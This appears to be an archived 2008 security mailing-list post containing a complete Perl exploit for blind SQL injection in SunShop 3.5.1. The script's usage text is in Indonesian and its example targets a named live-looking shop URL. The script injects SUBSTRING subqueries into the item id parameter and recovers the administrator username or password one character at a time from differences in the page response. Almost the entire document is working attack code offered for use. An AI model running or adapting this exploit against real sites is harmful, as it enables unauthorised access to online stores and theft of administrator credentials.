SunShop Version 3.5.1 Remote Blind Sql Injection

Thu, 15 May 2008 11:04:27 -0700 

#!/usr/bin/perl -w

use LWP::UserAgent;

# scripts : SunShop Version 3.5.1 Remote Blind Sql Injection

# scripts site : http://www.turnkeywebtools.com/sunshop/

# Discovered

# By : irvian

# site : http://irvian.cn

# email : [EMAIL PROTECTED]


print "\r\n[+]-----------------------------------------[+]\r\n";

print "[+]Blind SQL injection [+]\r\n";

print "[+]SunShop Version 3.5.1 [+]\r\n";

print "[+]code by irvian [+]\r\n";

print "[+]special : ifx, arioo, jipank, bluespy [+]\r\n";

print "[+]-----------------------------------------[+]\n\r";

if (@ARGV < 5){

die "


Cara Mengunakan : perl $0 host option id tabel itemid


Keterangan

host : http://victim.com

Option : pilih 1 untuk mencari username dan pilih 2 untuk mencari password

id : Isi Angka Kolom id biasanya 1, 2 ,3 dst

tabel : Isi Kolom tabel biasanya admin atau ss_admin

itemid : Isi Angka valid (ada productnya) di belakang index.php?action=item&id=

Contoh : perl $0 http://www.underhills.com/cart 1 1 admin 10

\n";}



$url = $ARGV[0];

$option = $ARGV[1];

$id = $ARGV[2];

$tabel = $ARGV[3];

$itemid = $ARGV[4];


if ($option eq 1){

syswrite(STDOUT, "username: ", 10);}

elsif ($option eq 2){

syswrite(STDOUT, "password: ", 10);}


for($i = 1; $i <= 32; $i++){

$f = 0;

$n = 32;

while(!$f && $n <= 57)

{

if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){

$f = 1;

syswrite(STDOUT, chr($n), 1);

}

$n++;

}

if ($f==0){

$n = 97;

while(!$f && $n <= 122)

{

if(&blind($url, $option, $id, $tabel, $i, $n, $itemid)){

$f = 1;

syswrite(STDOUT, chr($n), 1);

}

$n++;

}

}

}

print "\n[+]finish Execution Exploit\n";


sub blind {

my $site = $_[0];

my $op = $_[1];

my $id = $_[2];

my $tbl = $_[3];

my $i = $_[4];

my $n = $_[5];

my $item = $_[6];


if ($op eq 1){

$klm = "username";

}

elsif ($op eq 2){

$klm = "password";

}

my $ua = LWP::UserAgent->new;

my $url = 
"$site"."/index.php?action=item&id="."$item"."'%20AND%20SUBSTRING((SELECT%20"."$klm"."%20FROM%20"."$tbl"."%20WHERE%20id="."$id"."),"."$i".",1)=CHAR("."$n".")/*";

my $res = $ua->get($url);

my $browser = $res->content;

if ($browser !~ /This product is currently not viewable/i){

return 1;

}

else {

return 0;

}


}

Reply via email to